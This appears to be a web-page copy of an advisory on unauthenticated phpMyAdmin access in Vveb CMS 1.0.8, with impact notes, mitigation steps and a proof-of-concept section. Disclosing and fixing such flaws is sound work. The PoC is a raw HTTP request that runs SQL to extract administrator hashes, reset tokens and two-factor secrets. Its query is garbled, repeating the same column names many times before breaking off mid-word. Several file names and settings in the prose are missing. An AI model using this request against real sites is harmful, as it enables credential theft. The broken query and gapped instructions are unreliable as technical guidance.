Vveb CMS 1.0.8 Unauthenticated phpMyAdmin Access and Database Dump

Unauthenticated phpMyAdmin (auth_type=config) Leads to Full Database Read/Write and Bcrypt Hash Dump Vulnerability Overview In Vveb CMS version 1.0.8, the upstream Docker configuration file ( ) configures phpMyAdmin to use . This means that phpMyAdmin has fixed usernames and passwords embedded in its server-side configuration, allowing direct access to the database without authentication. This configuration is hardcoded into the image, granting any attacker who can access the phpMyAdmin URL full control over the database. Impact Scope Affected Version: Vveb CMS 1.0.8 (commit ) Severity: Critical Impact: - Data Leakage: Attackers can read all data in the database, including Bcrypt hashes for administrators and customers. - Data Tampering: Attackers can modify database contents. - Credential Reuse: Obtained hashes can be cracked offline and used to attack other services. - Audit Log Compromise: Attackers can delete or modify audit logs. Remediation Temporary Mitigation (No Code Changes Required) 1. Remove the port mapping for the phpMyAdmin service from the running file (remove ), then run . 2. If web-based database management is required, place phpMyAdmin behind an authenticated reverse proxy (such as nginx/apache or mTLS) and restrict access to the internal Docker network only. Long-term Fix (Upstream Patch) 1. In and , remove and from the service environment variables and add . 2. Bind the service to the internal Docker network (change to ). 3. Restrict permissions for the MySQL instance, granting only the minimum privileges required by the application. 4. Clearly state in the README that any deployment exposing phpMyAdmin to non-loopback interfaces must use cookie authentication and an HTTPS reverse proxy. 5. Long-term recommendation: Distribute a separate example that does not include the phpMyAdmin service. POC Code / Exploit Code 1. Access phpMyAdmin Homepage (No Authentication Required) 2. Extract Administrator Hash (SQL Query) ```http POST /index.php?route=/sql HTTP/1.1 Host: localhost:47281 Cookie: phpMyAdmin=sessionid; pma_lang=en X-Requested-With: XMLHttpRequest Connection: close Content-Length: 0 sql_query=SELECT+admin_user%2Cusername%2Cemail%2Cpassword%2Ccreated_at%2Cupdated_at%2Cpassword_reset_token%2Cis_active%2Crole%2Clast_login%2Cfailed_login_attempts%2Clocked_until%2Ctwo_factor_secret%2Ctwo_factor_backup_codes%2Ctwo_factor_enabled%2Ctwo_factor_last_used%2Ctwo_factor_ip%2Ctwo_factor_user_agent%2Ctwo_factor_device_name%2Ctwo_factor_device_id%2Ctwo_factor_device_fingerprint%2Ctwo_factor_device_last_used%2Ctwo_factor_device_last_ip%2Ctwo_factor_device_last_user_agent%2Ctwo_factor_device_last_fingerprint%2Ctwo_factor_device_last_login%2Ctwo_factor_device_last_ip%2Ctwo_factor_device_last_user_agent%2Ctwo_factor_device_last_fingerprint%2Ctwo_factor_device_last_login%2Ctwo_factor_device_last_ip%2Ctwo_factor_device_last_user_agent%2Ctwo_factor_device_last_fingerprint%2Ctwo_factor_device_last_login%2Ctwo_factor_device_last_ip%2Ctwo_factor_device_last_user_agent%2Ctwo_factor_device_last_fingerprint%2Ctwo_factor_device_last_login%2Ctwo_factor_device_last_ip%2Ctwo_factor_device_last_user_agent%2Ctwo_factor_device_last_fingerprint%2Ctwo_factor_device_last_login%2Ctwo_factor_device_last_ip%2Ctwo_factor_device_last_user_agent%2Ctwo_factor_device_last_fingerprint%2Ctwo_factor_device_last_login%2Ctwo_factor_device_last_ip%2Ctwo_factor_device_last_user_agent%2Ctwo_factor_device_last_fingerprint%2Ctwo_factor_device_last_login%2Ctwo_factor_device_last_ip%2Ctwo_factor_device_last_user_agent%2Ctwo_factor_device_last_fingerprint%2Ctwo_factor_device_last_login%2Ctwo_factor_device_last_ip%2Ctwo_factor_device_last_user_agent%2Ctwo_factor_device_last_fingerprint%2Ctwo_factor_device_last_login%2Ctwo_factor_device_last_ip%2Ctwo_factor_device_last_user_agent%2Ctwo_factor_device_last_fingerprint%2Ctwo_factor_device_last_login%2Ctwo_factor_device_last_ip%2Ctwo_factor_device_last_user_agent%2Ctwo_factor_device_last_fingerprint%2Ctwo_factor_device_last_login%2Ctwo_factor_device_last_ip%2Ctwo_factor_device_last_user_agent%2Ctwo_factor_device_last_fingerprint%2Ctwo_factor_device_last_login%2Ctwo_factor_device_last_ip%2Ctwo_factor_device_last_user_agent%2Ctwo_factor_device_last_fingerprint%2Ctwo_factor_device_last_login%2Ctwo_factor_device_last_ip%2Ctwo_factor_device_last_user_agent%2Ctwo_factor_device_last_fingerprint%2Ctwo_factor_device_last_login%2Ctwo_factor_device_last_ip%2Ctwo_factor_device_last_user_agent%2Ctwo_factor_device_last_fingerprint%2Ctwo_factor_device_last_login%2Ctwo_factor_device_last_ip%2Ctwo_factor_device_last_user_agent%2Ctwo_factor_device_last_fingerprint%2Ctwo_factor_device_last_login%2Ctwo_factor_device_last_ip%2Ctwo_factor_device_last_user_agent%2Ctwo_factor_device_last_fingerprint%2Ctwo_factor_device_last_login%2Ctwo_factor_device_last_ip%2Ctwo_factor_device_last_user_agent%2Ctwo_factor_device_last_fingerprint%2Ctwo_factor_device_last_login%2Ctwo_factor_device_last_ip%2Ctwo_factor_device_last_user_age

Goal Reached Thanks to every supporter — we hit 100%!

Vveb CMS 1.0.8 Unauthenticated phpMyAdmin Access and Database Dump

More from this source